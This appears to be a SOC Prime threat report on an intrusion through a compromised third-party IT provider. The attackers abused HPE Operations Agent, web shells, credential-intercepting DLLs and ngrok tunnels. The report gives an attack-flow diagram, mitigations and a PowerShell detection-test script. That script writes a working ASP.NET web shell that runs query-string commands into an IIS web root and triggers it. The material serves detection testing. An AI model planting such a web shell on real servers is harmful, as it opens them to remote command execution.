Investigating a Stealthy Intrusion Through Third-Party Compromise

SOC Prime Team

Investigating a Stealthy Intrusion Through Third-Party Compromise

Detection stack

AIDR
Alert
ETL
Query

Threat Report
Attack Flow
Detections
Simulations

Summary

The report examines a stealthy intrusion in which threat actors compromised a third-party IT services provider and then abused the legitimate HPE Operations Agent to deploy web shells, credential-stealing DLLs, and tunneling utilities. By relying on trusted management software instead of loud exploitation, the attackers were able to maintain long-term access while minimizing obvious signs of compromise.

Investigation

Microsoft Incident Response traced the activity from initial web shell deployment on internet-facing servers to VBScript execution through HPE Operations Agent. The investigation then uncovered registration of malicious network provider and password-filter DLLs on domain controllers, followed by reuse of harvested credentials and use of ngrok tunnels to support lateral movement across the environment.

Mitigation

Recommended defenses include reducing and tightly controlling trusted third-party access, monitoring for unauthorized DLL registration in LSA notification packages, detecting suspicious web shell changes, enforcing strict egress filtering, and ensuring EDR coverage across all endpoints.

Response

If this activity is detected, isolate the compromised systems, remove malicious DLLs and web shells, revoke any stolen credentials, disable unauthorized network providers, and hunt for lateral movement using the collected artifacts.

"graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef file fill:#e6e6e6 classDef malware fill:#ff9999 %% Nodes u2013 Initial Access action_initial_trusted["Action – T1199 Trusted Relationship Compromise thirdu2011party IT services provider and use trusted HPE Operations Agent to run malicious code."] class action_initial_trusted action tool_hpe_oa["Tool – Name: HPE Operations Agent (OA) Purpose: Legitimate agent used to execute scripts on target servers."] class tool_hpe_oa tool %% Nodes u2013 Execution action_execution_vbscript["Action – Execution of VBScripts (T1059.005) Run abc003.vbs for system, network and AD discovery."] class action_execution_vbscript action file_abc003["File – Name: abc003.vbs Type: Visual Basic Script"] class file_abc003 file %% Nodes u2013 Persistence (Web Shell) action_persistence_webshell["Action – T1505.003 Server Software Component: Web Shell Deploy Errors.aspx and Signoff.aspx web shells on internetu2011facing servers."] class action_persistence_webshell action file_errors["File – Name: Errors.aspx Function: Remote command execution web shell."] class file_errors file file_signoff["File – Name: Signoff.aspx Function: Remote command execution web shell."] class file_signoff file %% Nodes u2013 Persistence (Network Provider DLL) action_persistence_np_dll["Action – T1556.008 Network Provider DLL Register malicious mslogon.dll on domain controllers to capture clearu2011text credentials."] class action_persistence_np_dll action file_mslogon["File – Name: mslogon.dll Location: C:\Users\Public\Music\abc123c.d"] class file_mslogon file %% Nodes u2013 Persistence (Password Filter DLL) action_persistence_passdll["Action – T1556.002 Password Filter DLL Add passms.dll as LSA notification package on DC01/DC02 to intercept password changes."] class action_persistence_passdll action file_passms["File – Name: passms.dll Location: C:\ProgramData\WindowsUpdateService\UpdateDir\Ipd"] class file_passms file %% Nodes u2013 Credential Access (Files) action_cred_in_files["Action – T1552.001 Credentials In Files Store harvested credentials in clearu2011text or encoded files on disk."] class action_cred_in_files action %% Nodes u2013 Credential Access (OS Dumping) action_os_credential_dump["Action – T1003 OS Credential Dumping DLLu2011based interception provides credential dumping without external tools."] class action_os_credential_dump action %% Nodes u2013 Lateral Movement (Valid Accounts) action_lateral_local["Action – T1078.003 Valid Accounts: Local Accounts Reuse harvested credentials to authenticate via RDP and SMB."] class action_lateral_local action %% Nodes u2013 Lateral Movement (Remote Services) action_lateral_remote["Action – T1021 Remote Services Establish RDP sessions over encrypted ngrok tunnels to move laterally."] class action_lateral_remote action %% Nodes u2013 Command & Control (Proxy) action_c2_proxy["Action – T1090 Proxy Deploy ngrok as multiu2011hop proxy to create covert C2 channels."] class action_c2_proxy action tool_ngrok["Tool – Name: ngrok Purpose: Create TCP/HTTPS tunnels for traffic tunneling."] class tool_ngrok tool %% Nodes u2013 Command & Control (Protocol Tunneling) action_c2_tunnel["Action – T1572 Protocol Tunneling Encapsulate C2 traffic inside ngrok tunnels to evade detection."] class action_c2_tunnel action %% Nodes u2013 Collection (Network Shared Drive) action_collection_share["Action – T1039 Data from Network Shared Drive Stage encoded credential files on remote SMB shares before exfiltration."] class action_collection_share action %% Nodes u2013 Defense Evasion (DLL Hijack) action_defense_dll["Action – T1574.001 Hijack Execution Flow: DLL msupdate.dll exfiltrates data via SMTP and SMB, disguised as image files."] class action_defense_dll action file_msupdate["File – Name: msupdate.dll Payload: Encoded data sent as icon02.jpeg."] class file_msupdate file %% Nodes u2013 Persistence (Winlogon Helper DLL) action_persistence_winlogon["Action – T1547.004 Winlogon Helper DLL Register mslogon.dll as Winlogon helper to ensure execution at logon."] class action_persistence_winlogon action %% Connections u2013 Attack Flow action_initial_trusted –>|uses| tool_hpe_oa tool_hpe_oa –>|executes| action_execution_vbscript action_execution_vbscript –>|runs| file_abc003 action_execution_vbscript –>|leads to| action_persistence_webshell action_persistence_webshell –>|creates| file_errors action_persistence_webshell –>|creates| file_signoff action_persistence_webshell –>|enables| action_persistence_np_dll action_persistence_np_dll –>|installs| file_mslogon action_persistence_np_dll –>|enables| action_persistence_passdll action_persistence_passdll –>|installs| file_passms action_persistence_passdll –>|stores| action_cred_in_files action_cred_in_files –>|provides data for| action_os_credential_dump action_os_credential_dump –>|enables| action_lateral_local action_lateral_local –>|uses| action_lateral_remote action_lateral_remote –>|utilizes| tool_ngrok tool_ngrok –>|facilitates| action_c2_proxy action_c2_proxy –>|enables| action_c2_tunnel action_c2_tunnel –>|supports| action_collection_share action_collection_share –>|provides files for| action_defense_dll action_defense_dll –>|uses| file_msupdate action_defense_dll –>|supports| action_persistence_winlogon action_persistence_winlogon –>|relies on| file_mslogon %% Styling class action_initial_trusted,action_execution_vbscript,action_persistence_webshell,action_persistence_np_dll,action_persistence_passdll,action_cred_in_files,action_os_credential_dump,action_lateral_local,action_lateral_remote,action_c2_proxy,action_c2_tunnel,action_collection_share,action_defense_dll,action_persistence_winlogon action class tool_hpe_oa,tool_ngrok tool class file_abc003,file_errors,file_signoff,file_mslogon,file_passms,file_msupdate file "

Attack Flow

Attack Narrative & Commands:
1. Initial Compromise: The attacker gains write access to the web root (e.g., via a stolen credential or vulnerable upload endpoint).
2. Web‑Shell Deployment: They upload a malicious ASP.NET web‑shell named Errors.aspx (or modify an existing Signoff.aspx) that executes arbitrary PowerShell commands supplied via the query string.
3. Triggering the Shell: The attacker sends an HTTP GET request to the shell with a PowerShell payload in the cmd parameter, e.g., https://corp.example.com/Errors.aspx?cmd=whoami. This request is logged by IIS, producing a cs-uri-stem value of /Errors.aspx – exactly what the Sigma rule matches.

Regression Test Script: The script reproduces steps 2‑3 (upload is simulated by copying a pre‑crafted file into the web root; triggering is performed via Invoke-WebRequest).

# -------------------------------------------------
# Web‑Shell Simulation Script – Windows Server/IIS
# -------------------------------------------------
param (
    [string]$WebRoot = "C:inetpubwwwroot",
    [string]$ShellName = "Errors.aspx",
    [string]$Payload = "whoami"
)

# 1. Deploy a simple ASP.NET web‑shell (minimal for testing)
$shellContent = @"
<%@ Page Language="C#" %>
<% 
string cmd = Request.QueryString["cmd"];
if (!String.IsNullOrEmpty(cmd)) {
    System.Diagnostics.Process.Start("cmd.exe", "/c " + cmd);
}
%>
"@

$shellPath = Join-Path $WebRoot $ShellName
Set-Content -Path $shellPath -Value $shellContent -Encoding UTF8 -Force

Write-Host "[+] Deployed web‑shell to $shellPath"

# 2. Give the web server a moment to register the new file
Start-Sleep -Seconds 2

# 3. Invoke the web‑shell to generate the detection‑triggering log entry
$uri = "http://localhost/$ShellName?cmd=$Payload"
Invoke-WebRequest -Uri $uri -UseBasicParsing | Out-Null

Write-Host "[+] Triggered web‑shell via $uri"
# -------------------------------------------------

Cleanup Commands: Remove the test web‑shell and any residual files.

# Cleanup script – remove the simulated web‑shell
param (
    [string]$WebRoot = "C:inetpubwwwroot",
    [string]$ShellName = "Errors.aspx"
)
$shellPath = Join-Path $WebRoot $ShellName
if (Test-Path $shellPath) {
    Remove-Item -Path $shellPath -Force
    Write-Host "[+] Removed $shellPath"
} else {
    Write-Host "[-] Shell file not found; nothing to clean."
}

Join SOC Prime's Detection as Code platform to improve visibility into threats most relevant to your business. To help you get started and drive immediate value, book a meeting now with SOC Prime experts.

Join for Free